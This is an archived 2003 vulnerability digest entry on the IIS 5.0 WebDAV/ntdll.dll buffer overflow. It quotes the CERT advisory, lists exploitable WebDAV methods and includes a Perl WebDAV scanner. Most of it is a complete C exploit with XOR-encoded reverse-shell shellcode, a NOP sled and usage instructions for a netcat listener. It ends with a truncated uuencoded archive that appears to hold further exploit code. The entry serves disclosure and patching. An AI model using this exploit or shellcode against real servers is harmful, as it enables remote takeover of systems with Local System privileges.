18th Mar 2003 [SBWID-6073]
COMMAND
	IIS remote buffer overflow due to WebDAV/ntdll.dll
SYSTEMS AFFECTED
	IIS 5.0
PROBLEM
	In CERT Advisory [CA-2003-09] :
	
	 http://www.cert.org/advisories/CA-2003-09.html
	
	--snip--
	 IIS  5.0 includes support for WebDAV, which allows users to manipulate
	 files   stored   on   a   web  server  (RFC2518).  A  buffer  overflow
	 vulnerability  exists  in ntdll.dll (a portion of code utilized by the
	 IIS  WebDAV  component).  By sending a specially crafted request to an
	 IIS  5.0  server, an attacker may be able to execute arbitrary code in
	 the  Local  System  security  context, essentially giving the attacker
	 compete control of the system.
	--snap--
	 Update (19 March 2003)
	 ======
	Brett Moore [[email protected]] adds :
	Also if anyone is writing IDS or filtering systems, most of  the  webdav
	methods can be used to exploit this.
	These are some that I have found that can lead to exploitation.
	
	LOCK
	SEARCH
	PROPFIND
	COPY
	MKCOL
	
	-Also-
	SensePost Research [http://www.sensepost.com] wrote  a  WebDAV  scanning
	tool :
	
	> head -n 9 finder.pl
	#!/bin/perl
	##
	## This script test for most of the methods used by WebDAV
	## If the server does not complain about the method its an indication
	## that WebDAV is in use..
	##
	## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
	## for info why this is interesting..
	##
	
	Typical output:
	
	> perl finder.pl www.blah.co.za 80
	Testing WebDAV methods [www.blah.co.za 80]
	-------------------------------------
	www.blah.co.za : Server type is Microsoft-IIS/5.0
	Method PROPFIND seems to be allowed - WebDAV possibly in use
	Method PROPPATCH seems to be allowed - WebDAV possibly in use
	Method MCOL seems to be allowed - WebDAV possibly in use
	Method PUT seems to be allowed - WebDAV possibly in use
	Method DELETE seems to be allowed - WebDAV possibly in use
	Method LOCK seems to be allowed - WebDAV possibly in use
	Method UNLOCK seems to be allowed - WebDAV possibly in use
	> perl finder.pl  www.moreblah.com 80
	Testing WebDAV methods [www.moreblah.com 80]
	-------------------------------------
	www.moreblah.com : Server type is Microsoft-IIS/5.0
	Method PROPFIND is not allowed
	Method PROPPATCH is not allowed
	Method MCOL is not allowed
	Method PUT is not allowed
	Method DELETE is not allowed
	Method LOCK is not allowed
	Method UNLOCK is not allowed
	
	
	#!/bin/perl
	##
	## This script test for most of the methods used by WebDAV
	## If the server does not complain about the method its an indication
	## that WebDAV is in use..
	##
	## Please see http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
	## for info why this is interesting..
	##
	## SensePost Research
	## [email protected]
	## 2003/3/17
	## RT
	$|=1;
	use Socket;
	@methods = ("PROPFIND","PROPPATCH","MCOL","PUT","DELETE","LOCK","UNLOCK");
	if ($#ARGV<1){die "parameters: IP/dns_name port\n";}
	$target=@ARGV[0];
	$port=@ARGV[1];
	print "Testing WebDAV methods [$target $port]\n-------------------------------------\n";
	@results=sendraw2("HEAD / HTTP/1.0\r\n\r\n",$target,$port,15);
	if ($#results < 1){die "15s timeout to $target on port $port\n";}
	foreach $line (@results){
		if ($line =~ /Server:/){
			($left,$right)=split(/\:/,$line);
			$right =~ s/ //g; 
			print "$target : Server type is $right";
			if ($right !~ /Microsoft-IIS\/5.0/i){
				print "$target : Not a Microsoft IIS 5 box\n";
				exit(0);
			}
		}
	}
	foreach $method (@methods){
		@results=sendraw2("$method /test/nothere HTTP/1.0\r\n\r\n",$target,$port,15);
		if ($#results < 1){print "15s timeout to $target on port $port\n";}
		 $okflag=0;
		 foreach $line (@results){
			if ($line =~ /Method Not Supported/i){
				print "Method $method is not allowed\n";
				$okflag=1;
			}
			if (($line =~ /method/i) && ($line =~ /not allowed/i)){
				print "Method $method is not allowed\n";
				$okflag=1;
			}
		}
		if ($okflag==0){
			print "Method $method seems to be allowed - WebDAV possibly in use\n";
		}
	}
	########## Sendraw-2
	sub sendraw2 {
	        my ($pstr,$realip,$realport,$timeout)=@_;
	        my $target2 = inet_aton($realip);
	        my $flagexit=0;
	        $SIG{ALRM}=\&ermm;
	        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
	        alarm($timeout);
	        if (connect(S,pack "SnA4x8",2,$realport,$target2)){
	                alarm(0);
	                my @in;
	                select(S); $|=1;
	                print $pstr;
	                alarm($timeout);
	                while(<S>){
	                        if ($flagexit == 1){
	                                close (S);
	                                print STDOUT "Timeout\n";
	                                return "Timeout";
	                        }
	                        push @in, $_;
	                }
	                alarm(0);
	                select(STDOUT);
	                close(S);
	                return @in;
	        } else {return "0";}
	}
	sub ermm{
	        $flagexit=1;
	        close (S);
	}
	
	 Update (22 March 2003)
	 ======
	David Litchfield of NGSSoftware Ltd  [http://www.ngssoftware.com/]  adds
	:
	The patch announced  by  Microsoft  on  the  17th  March  2003  fixed  a
	security vulnerability  in  the  core  of  the  Windows  2000  operating
	system. This flaw was actively being exploited through  WebDAV  requests
	to Microsoft's Internet Information Server 5. It must be  stressed  that
	IIS was simply the attack vector; the method or route used  to  actually
	exploit the flaw. The problem, however, is  much  wider  in  scope  than
	just simply  machines  running  IIS.  Researchers  at  NGSSoftware  have
	isolated many more attack vectors including java based web  servers  and
	other non-WebDAV related issues in IIS. Due to  this,  NGSSoftware  urge
	Windows 2000 users to apply the patch.
	For a paper that examines the vulnerability in detail, please read :
	
	 http://www.ngssoftware.com/papers/ms03-007-ntdll.pdf
	
	 Update (24 March 2003)
	 ======
	Thanks       to       Rafael       N��ez       [[email protected]]
	[http://www.scientech.com.ve], Senior Research Scientist :
	
	/*******************************************************************/
	/*     [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]     */
	/* --------------------------------------------------------------- */
	/*     this is the exploit for ntdll.dll through WebDAV.           */
	/*     run a netcat ex: nc -L -vv -p 666                           */
	/*     wb server.com your_ip 666 0                                 */
	/*     the shellcode is a reverse remote shell                     */
	/*     you need to pad a bit.. the best way I think is launching   */
	/*     the exploit with pad = 0 and after that, the server will be */
	/*     down for a couple of seconds, now retry with pad at 1       */
	/*     and so on..pad 2.. pad 3.. if you haven't the shell after   */
	/*     something like pad at 10 I think you better to restart from */
	/*     pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
	/*     on all the others servers it was at 2,3,4, etc..sometimes   */
	/*     you can have the force with you, and get the shell in 1 try */
	/*     sometimes you need to pad more than 10 times ;)             */
	/*     the shellcode was coded by myself, it is SEH + ScanMem to   */
	/*     find the famous offsets (GetProcAddress)..                  */
	/*     I know I code like a pig, my english sucks, and my tech too */
	/*     it is my first exploit..and my first shellcode..sorry :P    */
	/*     if you have comments feel free to mail me at:               */
	/*     mailto: [email protected]                               */
	/*     or visit us at www.coromputer.net . You can speak with us   */
	/*     at IRC undernet channel #coromputer                         */
	/*     ok now the greetz:                                          */
	/*     [El0d1e] to help me find some information about the bug :)  */
	/*     tuck_ to support me ;)                                      */
	/*     and all my friends in coromputer crew! hein les poulets! =) */
	/*                                                                 */
	/*     Tested by Rafael [RaFa] Nunez  [email protected]      */
	/*                                                                 */
	/*     (take off the WSAStartup, change the closesocket, change    */
	/*       headers and it will run on linux boxes ;pPpPpP ).         */
	/*                                                                 */
	/*******************************************************************/
	#include <winsock.h>
	#include <windows.h>
	#include <stdio.h>
	#pragma comment (lib,"ws2_32")
	char shellc0de[] =
	        "\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
	        "\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
	        "\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
	        "\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
	        "\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
	        "\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
	        "\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
	        "\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
	        "\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
	        "\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
	        "\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
	        "\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
	        "\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
	        "\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
	        "\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
	        "\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
	        "\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
	        "\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
	        "\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
	        "\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
	        "\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
	        "\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
	        "\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
	        "\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
	        "\xff\xd0"
	        "CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
	        "connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
	        "cmd" // don't change anything..
	        "\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
	        "\x00\x00\xe8\x77"
	        "\x00\x00\xf0\x77"
	        "\x00\x00\xe4\x77"
	        "\x00\x88\x3e\x04" // win2k3
	        "\x00\x00\xf7\xbf" // win9x =P
	        "\xff\xff\xff\xff";
	int test_host(char *host)
	{
	      char search[100]="";
	      int sock;
	      struct hostent *heh;
	      struct sockaddr_in hmm;
	      char buf[100] ="";
	      if(strlen(host)>60) {
	            printf("error: victim host too long.\r\n");
	            return 1;
	      }
	  if ((heh = gethostbyname(host))==0){
	    printf("error: can't resolve '%s'",host);
	    return 1;
	  }
	  sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
	  hmm.sin_port = htons(80);
	  hmm.sin_family = AF_INET;
	  hmm.sin_addr = *((struct in_addr *)heh->h_addr);
	  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
	    printf("error: can't create socket");
	    return 1;
	  }
	  printf("Checking WebDav on '%s' ... ",host);
	  if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
	    printf("CONNECTING_ERROR\r\n");
	    return 1;
	  }
	      send(sock,search,strlen(search),0);
	      recv(sock,buf,sizeof(buf),0);
	if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
	      return 0;
	      printf("NOT FOUND\r\n");
	      return 1;
	}
	void help(char *program)
	{
	      printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
	      return;
	}
	void banner(void)
	{
	      printf("\r\n\t  [Crpt] ntdll.dll exploit trough WebDAV by kralor
	[Crpt]\r\n");
	      printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
	      return;
	}
	void main(int argc, char *argv[])
	{
	      WSADATA wsaData;
	      unsigned short port=0;
	      char *port_to_shell="", *ip1="", data[50]="";
	      unsigned int i,j;
	      unsigned int ip = 0 ;
	      int s, PAD=0x10;
	      struct hostent *he;
	      struct sockaddr_in crpt;
	      char buffer[65536] ="";
	      char request[80000];    // huuuh, what a mess! :)
	      char content[] =
	           "<?xml version=\"1.0\"?>\r\n"
	           "<g:searchrequest xmlns:g=\"DAV:\">\r\n"
	           "<g:sql>\r\n"
	           "Select \"DAV:displayname\" from scope()\r\n"
	           "</g:sql>\r\n"
	           "</g:searchrequest>\r\n";
	      banner();
	      if((argc<4)||(argc>5)) {
	            help(argv[0]);
	            return;
	      }
	if(WSAStartup(0x0101,&wsaData)!=0) {
	      printf("error starting winsock..");
	      return;
	      }
	if(test_host(argv[1]))
	      return;
	if(argc==5)
	      PAD+=atoi(argv[4]);
	printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);
	      ip = inet_addr(argv[2]); ip1 = (char*)&ip;
	shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
	shellc0de[451]=ip1[3];
	      port = htons(atoi(argv[3]));
	      port_to_shell = (char *) &port;
	      shellc0de[446]=port_to_shell[0];
	      shellc0de[447]=port_to_shell[1];
	// we xor the shellcode [xored by 0x95 to avoid bad chars]
	 __asm {
	  lea eax, shellc0de
	  add eax, 0x34
	xor ecx, ecx
	mov cx, 0x1b0
	wah:
	xor byte ptr[eax], 0x95
	inc eax
	loop wah
	}
	  if ((he = gethostbyname(argv[1]))==0){
	    printf("error: can't resolve '%s'",argv[1]);
	    return;
	  }
	  crpt.sin_port = htons(80);
	  crpt.sin_family = AF_INET;
	  crpt.sin_addr = *((struct in_addr *)he->h_addr);
	  if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
	    printf("error: can't create socket");
	    return;
	  }
	  printf("Connecting... ");
	  if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
	    printf("ERROR\r\n");
	    return;
	  }
	// No Operation.
	for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
	// fill the buffer with the shellcode
	for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
	// well..it is not necessary..
	for(i=0;i<2500;buffer[i]=PAD,i++);
	/* we can simply put our ret in this 2 offsets.. */
	//buffer[2086]=PAD;
	//buffer[2085]=PAD;
	      buffer[sizeof(buffer)]=0x00;
	      memset(request,0,sizeof(request));
	      memset(data,0,sizeof(data));
	      sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
	      sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
	      printf("CONNECTED\r\nSending evil request... ");
	      send(s,request,strlen(request),0);
	      send(s,content,strlen(content),0);
	      printf("SENT\r\n");
	      recv(s,data,sizeof(data),0);
	      if(data[0]!=0x00) {
	      printf("Server seems to be patched.\r\n");
	      printf("data: %s\r\n",data);
	      } else
	      printf("Now if you are lucky you will get a shell.\r\n");
	      closesocket(s);
	      return;
	}
	
	 Update (26 march 2003)
	 ======
	Roman Medina [[email protected]] adds :
	I wrote another exploit for the nt.dll bug some  days  ago.  Explanation
	and a little documentation is included in the source file.  It  compiles
	in Linux/gcc without any error.
	
	http://www.rs-labs.com/exploitsntools/rs_iis.c
	
	-Also-
	Mat [[email protected]] posts :
	
	UUEncode
	begin 644 webdav.zip
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
